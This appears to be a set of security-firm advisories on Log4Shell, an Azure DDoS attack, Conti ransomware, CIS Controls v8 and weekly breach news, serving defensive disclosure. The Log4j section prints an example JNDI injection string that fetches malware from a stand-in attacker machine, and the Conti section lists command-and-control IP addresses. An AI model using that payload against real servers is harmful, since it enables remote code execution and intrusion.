Breach

Log4j Update – What You Need to Know

Overview

On December 10^th, 2021, CVE-2021-44228 (Log4Shell) was released affecting the Log4j Java logging framework. This vulnerability received the highest possible CVSS score of 10 out of 10. There have been three other vulnerabilities released related to Log4j since then, but the original is the most critical by far. Initially discovered by Chen Zhaojun, who works for Alibaba’s security team, back on November 24^th, 2021 which was the privately disclosed to Apache. The risk of this vulnerability is so severe, as a precautionary measure, Canada shut down 4,000 government sites. Since the public release there has been reports of millions of attempts to exploit the vulnerability across the world, but as of January 10^th, CISA stated they have not seen any significant intrusions related to Log4j.

So, what is Log4j, what makes it so vulnerable, and how do you exploit it?

Log4j is a piece of software, which most surprisingly is developed and maintained by a group of volunteers, that was coded in Java and logs activity of users on computers. An example of activity that is captured and logged would be navigating to a nonworking link on a web page and receiving a 404 error. Log4j is also used for diagnostic messages in software such as amount of memory being used and user commands entered. The logging of this information isn’t the issue, it’s the fact that the code actively interprets the activity that it is logging, meaning that remote code can be executed. Within Log4j there is a feature called Java Naming Directory Interface (JNDI) that allows commands to be run that are wrapped in ${…}. This feature allows live lookups both inside and outside of your network. With this correct sequence of input, this feature can be used to place malware on the server and have full remote code execution on the host. An example input of ${jndi:ldap://myattackingmachine:9999/Malware} would reach out to an attacking machine IP on port 9999 and download the malware file that is being hosted.

Products affected

The image below, courtesy of xkcd, describes the impact of this vulnerability perfectly.

At this time, it’s almost safe to assume that all products are affected as Log4j has been discovered to be deeply embedded in so many pieces of software, even to some that were not aware of its existence. Popular products like Minecraft, Apple’s iCloud, AWS, the NSA’s reverse engineering tool Ghidra, and the list goes on. CISA continues to update their GitHub with a list of known products to be affected.

Detection & Patching

To discover what systems to patch, here are a few steps to take:

Identify any internet facing assets.
Use authenticated vulnerability scanning to detect devices that have been impacted.
If you have an endpoint detection and response (EDR) system, you can use that to search for Log4j files.
Determine the version of Log4j being used. Version 2.0 to 2.14.1 are the versions that are vulnerable.
Update to the current version 2.17.1.
Repeat the above steps on internal IT and OT systems.

To prevent Log4j from being exploited, there are a few steps to take.

Search logs for IPs that have known to be scanning for the vulnerability and add them to your block list. A running list of known IPs can be found here.
Block a list of IPs that have been used to host a malicious payload to execute the vulnerability.
Review the list of IOCs being updated by Microsoft.
Review the additional list of IOCs being updated by the Curated Intelligence Trust Group.

Additional links

There have been many articles and resources that have been published since the release of this vulnerability, so in addition to the links in this Security Advisory, nGuard wanted to provide a few additional for further reading.

If you want to try and exploit the vulnerability yourself, John Hammond and TryHackMe have created a room for you to do so. https://tryhackme.com/room/solar
A Growing List of Tenable Nessus Plugins being release for detection of Log4j. https://community.tenable.com/s/article/Plugins-associated-with-CVE-2021-44228-Log4Shell
The team at Huntress has had great coverage and updates, including an open-source tool to help detect the vulnerability. https://log4shell.huntress.com/
The National Cyber Security Centrum (NCSC-NL) has been maintaining another GitHub repository with a list of information for hunting, IOCs, detection and mitigation, scanning, and vulnerable software. https://github.com/NCSC-NL/log4shell
CISA Released an open-source Log4j Scanner. https://github.com/cisagov/log4j-scanner

If you feel you need assistance with the detection of vulnerable Log4j instances, have discovered a Log4j related incident, or need general security services related to this vulnerability or anything else, reach out to nGuard. nGuard offers Log4j scanning, consulting services, log management and event collection, and penetration testing services.

Microsoft Azure Mitigates Impressive DDoS Attack

Microsoft is reporting that nearly 70,000 sources spread across the globe are responsible for one of the largest cyber-attacks in history. A Distributed Denial-of-Service (DDoS) attack is a cyber-attack in which the adversary attempts to make a machine or network resource unavailable to its intended users by flooding the target machine with requests in an attempt to overload the system. A report by Link11 suggests that DDoS attacks are on the rise, as we have seen a 33 percent increase during the first half of 2021.

Microsoft reports that the attack, while lasting only around 10 minutes, was one of the most significant they have ever seen. Bursts of traffic that peaked out at 2.4 Tbps were utilized in attempt to cripple servers and prevent legitimate traffic from reaching its target. While DDoS attacks on their own can be devastating for organizations with internet facing services, many times they are used as a distraction for an even more sophisticated attack. An attacker with persistent access to an internal network may use an external DDoS attack to distract IT staff while ransomware is deployed across the internal network.

The Azure security team was able to confirm that all services remained online during the attack due to security controls that mitigate the effect of large-scale DDoS attacks. How would your organization’s internet facing infrastructure hold up against an attack like this? Here are some mitigating steps:

Reduce Attack Surface – Limiting the internet facing attack landscape is the best way to reduce the risk of DDoS attacks.
Scaling – Scaling your infrastructure to absorb a large-scale DDoS attack can be a great way to mitigate risk. Utilizing Content Distribution Networks (CDNs) or Load Balancers to spread traffic out across multiple servers can limit the effect overwhelming amounts of traffic can have on a single server.
Know What is Normal – Having a general idea of what is a normal amount of traffic and what is not can assist you in configuring technologies to prevent against DDoS attacks. Configuring proper rate limiting and traffic analysis to block illegitimate traffic could save you a major headache.
Deploy Sophisticated Controls – Web Application Firewalls (WAFs) are sophisticated tool sets that can detect and block these types of attacks. They can be configured to protect your application by blocking source IPs, whitelisting specific geo-locations, and stopping illegitimate requests in their tracks.
Penetration Testing – Performing external and web application penetration tests can point you to vulnerabilities that would be at risk of a DDoS attack. Patching these holes on your external perimeter may save your organization from experiencing unproductive downtime.

Conti Ransomware CISA Alert & Attack Playbook

On September 22^nd, the Cybersecurity & Infrastructure Security Agency (CISA) released an alert regarding a spike in the use of Conti ransomware. Conti ransomware has been used in attacks more than 400 times against U.S based and international organizations. Back in May, the FBI also released a flash on Conti Ransomware and its impact on healthcare and first responder networks.
Conti ransomware is classified as a ransomware-as-a-service (RaaS) model with a small difference in how its threat actors are compensated. Rather than paying a percentage of the earning from a successful attack, they pay a wage to the individuals who deploy the ransomware. CISA advises Conti typically gains access to networks in the following ways:

Spear phishing containing malicious links or attachments. Once the link is clicked or the attachment is opened, malware is usually placed on the system to help gain persistent access with Command and Control (C2) operated by software like Cobalt Strike. nGuard published a security advisory on Cobalt Strike earlier this year.
Stolen or weak remote desktop protocol (RDP) credentials.
Phone calls.
Fake software promoted through search engine optimization (SEO).
Other malware distribution networks (ZLoader).
Common vulnerabilities in external assets.

Recently, a Conti ransomware playbook was leaked, giving insight on how the organization operates. Some of the main takeaways are how Conti gains access, and the IP addresses they use for their Cobalt Strike C2 servers. Conti has been taking advantage of the recent PrintNightmare vulnerability, Zerologon vulnerability, and the 2017 Windows SMB 1.0 vulnerabilities. A few IPs they are known to use for their C2 operations are:

162.244.80.235
85.93.88.165
185.141.63.120
82.118.21.1

It is recommended you block these IPs in your firewall to prevent any type of inbound or outbound connection and then be alerted if there is any connection attempts.

To reduce risk, CISA, FBI, and NSA and recommending the following mitigations:

Implement multi-factor authentication (MFA) to remotely access networks
Implement network segmentation and filter traffic. This will make it more difficult for ransomware to spread should it find its way into your network.
Scan for vulnerabilities and keep software updated.
Remove unnecessary applications and apply controls.
Implement endpoint detection and response tools.
Limit access to resources, especially RDP.
Secure user accounts.
If infected, use the Ransomware Response Checklist.

CIS Controls v8 (Part 3)

Summary
Last month, nGuard released a security advisory called CIS Controls v8 (Part 2) where we covered controls 7-12. This time, we are wrapping it up by covering the remaining 8 controls that are essential for a company who puts emphasis on a strong security posture. Read about these controls below and then take action within your organization to implement them.

Controls
Control 13: Network Monitoring and Defense
If an attacker gained access to your internal network, would you even know that it happened? It is essential that tools be in place to monitor network traffic for malicious activity and take action if necessary. Implementing an intrusion prevention system and log management system, then configuring it to meet the needs of your organization can halt simple attacks in their tracks.

Control 14: Security Awareness and Skills Training
Employees are the weakest link in the chain of organizational security landscape. Step 1 for any company looking to increase their security posture should be training employees to put a halt to social engineering attempts. At nGuard, we regularly conduct advanced social engineering campaigns for our customers — their employees fall for it every time. It is essential to establish and maintain a security awareness program for employees and conduct simulations if possible. Make security part of your company’s culture.

Control 15: Service Provider Management
We have been seeing a lot of disturbing headlines lately in which companies release data to third-parties and those vendors allow the data to become compromised. While the vendor may be responsible, perhaps the contracting organization didn’t conduct proper due diligence. Take service provider management seriously by having a developed process in place to evaluate whether or not this vendor is going to put security first while in possession of your sensitive data.

Control 16: Application Software Security
Any nGuard engineer will tell you that the easiest way to compromise a system is by exploiting critical, widely-known vulnerabilities due to outdated or unsupported software. Although these companies rely on a slew of software packages to conduct daily business operations, they fail to update them when security patches are released. nGuard recommends that you maintain a list of firmware and software that will need to be updated; sign up for mailing lists that will alert you when new patches are to be released; and configure automatic updates if possible. Do not let your software be outdated for an extended period of time!

Control 17: Incident Response Management
Many security professionals will tell you that it’s not a matter of “if,” but a matter of “when” a company will become compromised in some form or fashion. Is your organization prepared to recover from a ransomware attack? If not, maybe it’s time to think about this. Having a well-developed incident response plan in place can prevent a world a trouble. Develop policies, plans, procedures, define roles, conduct training, and develop communication plans to mitigate threats. Once these measures have been implemented, conduct table top exercises to test the plan you have put in place.

Control 18: Penetration Testing
This is nGuard’s favorite control. Penetration testing attempts to evaluate the security of an IT infrastructure by safely trying to exploit vulnerabilities. While vulnerability scans do a great job of pointing you to the low hanging fruit that attackers will take advantage of, penetration testing brings a real-world expert into your environment to chain together vulnerabilities and give you a better evaluation of potential risk. Start with external penetration testing to secure your public facing infrastructure and then move to internal penetration testing to make life harder for an attacker that gets in.

Next Steps
nGuard offers a wide variety of services that will help guide your organization on its path to implementing these critical security controls. Our Strategic Security Assessment allows your organization’s key players the opportunity to sit down with a security consultant who knows these controls like the back of their hand. Not only will they help you strengthen the controls that are already in place, they will make recommendations for the areas in which your organization falls short. Below are some other ways nGuard can help your business implement these controls:

This Week In Cybersecurity (TWIC)

It’s another busy week in the world of cybersecurity and nGuard wants to keep our advisory readers up to date. This week, nGuard is bringing you everything from the US State Department being attacked to Microsoft Power Apps leaking 38 million records.

US State Department Hit By Cyber-Attack

On August 21, Fox News journalist Jacqui Heinrich reported that the U.S. State Department suffered a cyber-attack. This led to the Department of Defense Cyber Command making notifications of a possible serious breach. A spokesperson for the State Department was quoted as saying, “The department takes seriously its responsibility to safeguard its information and continuously takes steps to ensure information is protected. For security reasons, we are not in a position to discuss the nature or scope of any alleged cybersecurity incidents at this time.” The State Department will not likely release any details of the attack. This comes in the wake of recent attacks on Colonial Pipeline and JBS from Russia, and the Microsoft Exchange Server attacks originating from China.

AT&T Data Being Sold On The Dark Web

Last week it was T-Mobile, this week it’s AT&T. The hacker gang, ShinyHunters, is claiming they have the data of 70 million AT&T customers personal identifiable information (PII) which includes names, phone numbers, social security numbers, dates of birth, addresses, and more. ShinyHunters are selling the data on RaidForums in small segments for $30,000 or the entire database for $1 million. AT&T has denied this information came from their systems.

Microsoft Power Apps Leaks 38 Million Records

The data of 38 million people was mistakenly exposed to the internet which was caused by an issue with more than 1000 Microsoft web applications. Some of the companies that were affected are American Airlines, Ford, J.B. Hunt, the Maryland Department of Health, the New York City Municipal Transportation Authority, and New York City public schools. The information leaked included COVID-19 contact tracing platforms, vaccination information, job application portals, and employee databases. The information included vaccination status, social security numbers, home addresses, and phone numbers. The flaw that allowed this leak to occur was in the Power Apps application programming interface (API) default setting which opened the information to the public. The privacy settings needed to be changed manually to prevent this from happening, but a majority of customers were not aware of this option.

President Biden Hosts Tech, Energy, Finance Leaders Meet In ‘Call to Action’

On Wednesday August 25^th, Apple, Amazon, Google, Microsoft and chief executives from insurance, energy and water companies were summoned to the White House to focus on improving cybersecurity. This meeting comes as recent high-profile attacks like the SolarWinds and Microsoft Exchange attacks have become more frequent. The White House wanted to address these areas of concern and determine how to best protect the 16 Critical Infrastructure sectors. Additionally, nonprofit organizations focused on computer science education and several colleges were included in the meeting to discuss efforts on how to address the gap of roughly 500,000 vacant U.S. cybersecurity jobs.

This Week In Cybersecurity (TWIC)

It’s another busy week in the world of cybersecurity and nGuard wants to keep our advisory readers up-to-date. This week, nGuard is bringing you everything from a T-Mobile data breach that exposed some extremely sensitive data to a Windows zero-day that may allow remote code execution.

T-Mobile Data Breach
Late Sunday night, the U.S. Sun reported that T-Mobile USA had likely suffered a massive data breach. T-Mobile was made aware of the breach after a hacker posted large swaths of data for sale on a popular online hacking forum. Early reports show the information from over 100 million customers may be at risk. This data set includes drivers license information, physical addresses, phone numbers, names, social security numbers, and unique IMEI numbers.

Norton and Avast Merger
On August 11^th, the security community was made aware that anti-virus giants NortonLifeLock and Avast were going to merge in a deal worth more than $8 billion. While both companies offer a similar product set, Norton’s experience with identity logistics and Avast’s individual focus on privacy could lead us down the path to the ultimate anti-virus product. With ransomware attacks on the rise, this merger could be timely for security professionals.

Gigabyte Ransomware Attack
Bleeping Computer and United Daily News were the first to report that Taiwan-based computer manufacturer, Gigabyte, had been the latest company to suffer a large-scale ransomware attack. Early reports are confirming that IT infrastructure was shut down, but the attack may be worse than originally expected. The attack appears to have been carried out by an organization called RansomEXX. This organization is also responsible for the attacks on the Brazilian government and the Texas’ Department of Transportation.

Windows Print Spooler Zero-Day
Late last week, Microsoft confirmed the presence of a Windows print spooler vulnerability now known as CVE-2021-36958. This is one of many vulnerabilities in a class of bugs known as “PrintNightmare.” This vulnerability utilizes the CopyFile registry directive on the device to copy a DLL file that ultimately allows an attacker to gain SYSTEM level privileges on the device. Microsoft quickly released security updates to address this vulnerability.